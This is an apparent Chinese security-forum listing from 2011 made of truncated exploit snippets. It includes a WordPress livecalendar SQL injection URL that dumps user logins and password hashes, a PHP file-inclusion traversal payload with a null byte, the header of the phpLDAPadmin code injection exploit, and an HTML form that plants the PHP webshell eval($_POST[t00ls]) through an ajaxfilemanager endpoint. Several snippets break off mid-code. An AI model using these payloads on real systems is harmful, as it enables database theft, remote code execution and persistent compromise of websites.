Php安全新闻早8点(2011-11-21 星期一)

    http://hi.baidu.com/micropoor '2011-11-21 星期一 '插入篇---asp篇 '程序员的思维 'Micropoor.asp代码片段 <% '略   dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath   dim dirTemplate : dirTemplate="../Upload"   dim path : path=getForm("path","get") : if isNul(path) then path= dirTemplate   if left(path,9)<>"../Upload" then alert "

Wordpress plugin livecalendar SQL injection

/**************************************************** *     Wordpress plugin livecalendar SQL injection *     From WwW.bhst.OrG Black-Hat Security Team *     Author LengF              Contact:81sec.com ****************************************************/ 漏洞文件: wp-content/plugins/livecalendar/kcalendar.php POC: http://hackit.com/wp-content/plu ... th=10&catid=-1/**/union/**/select/**/user_login,user_pass/**/from wp_users/*     这个injection比较低级,不过这个插件貌似网上很难找到。分享给大家,

Php安全新闻早8点(2011-11-19 星期六)

    http://hi.baidu.com/micropoor //2011-11-19 星期六 //程序员的思维 //Micropoor.php代码片段 <?php //略 $modd=$_GET[mod];  … if(!$tpl->isCached(INDEX_TEMPLATE."product_".$modd.".".$tplext,$cacheid)){   require_once './source/module/$modd.php'; //略 } //我们的思维 index.php?mod=../../1.php%00 //其他条件 php.ini allow_url_fopen=on /

phpLDAPadmin <= 1.2.1.1 (query_engine) 远程PHP代码注入漏洞

<?php /*     ------------------------------------------------------------------------     phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit     ------------------------------------------------------------------------          author...............: EgiX     mail.................: n0b0d13s[at]gmail[dot]com     software link........: http://phpldapadmin.sourceforge.net/     affected versions....: from 1.2.0 to 1.2.1.1     +-------------------------------------------------------------------------+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be not responsible for any damage. |     +-------------------------------------------------------------------------+     

PHP Web 木马扫描器 - 安全测试工具

scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba                                   */ /* [+] QQ: 1499281192                                  */ /* [+] MSN: weeming21@hotmail.com                      */ /* [+] 首发: t00ls.net

嘉缘人才系统漏洞

By:毅心毅意 为什么会出现漏洞...看这里 http://www.exploit-db.com/exploits/18075/ exp: jiayun.html: <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"><input type="text" value="http://127.0.0.1/freditor/plugins/ajaxfilemanager/ajax_create_folder.php" name="doaction" style="width:400"><br /><input type="text" value="<?php eval($_POST[t00ls])?>" name="foo" style="width:400"><br /><input type="submit" value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){ document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>